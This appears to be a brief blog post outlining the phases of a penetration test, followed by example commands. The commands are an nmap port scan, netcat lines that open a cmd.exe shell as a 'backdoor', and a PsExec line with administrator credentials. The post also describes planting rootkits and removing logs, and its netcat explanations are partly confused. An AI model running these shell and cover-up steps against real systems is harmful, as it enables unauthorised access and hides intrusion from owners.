Preparation to pentesting.
- Footprinting - Determining the targets footprint, e.g. DNS records, IP scope, public information, contact information, etc.
- Scanning - Determining the targets openings, e.g. service ports, wireless networks, modems pools, vpn servers, etc.
- Enumeration - Determining the services behind the openings, e.g. webservers, systems, routers, firewalls, wifi authentication, etc.
- Penetration - Selecting appropiate exploits and penetrate the target, e.g. SQL injection, buffer overflow, password attacks, etc.
- Escalation - Escalation of the credentials to admin or root, e.g. dll injection, local exploit, configuration change, sceduled jobs, etc.
- Getting Interactive - Getting a remote shell or GUI on the target, e.g. RDP, VNC, NetCat, etc.
- Expanding Influence - Moving from the initial target as a foothold or beach-head to the rest of the network taking over the domain.
- Cleaning Up - Ensuring backdoors and removing evidence, e.g. rootkits, log removal, log editing, etc.
- Reporting - Writing and presenting a report on the pen-test to the owners of the network one had authoritation to test.
more infos, read these
- Infosecwriters Demystifying Pen-test Article
- OSSTMM
- ISSAF
- Professionalsecuritytesters
- Penetration Testing Framework
Basic tools and examples
Portscanner
Nmap -sS -vv -P0 -n -p 21,80,443 // probing for open port
Backdoor
Nc.exe -l -p 80 // execute a backdoor and listen to port 80 for outbound connection
Nc.exe -v -e cmd.exe <the backdoored ip address > 80 // connect to backdoor
PSexec tools useful for remote access
PSexec \\ -u administrator -p password -s cmd.exe
VNC same as PSexec, it's stress on GUI
A password cracker tools
Brutus Password cracker
THC password cracker
AircrackNG WIFI - WEP cracker
0 Comments:
Post a Comment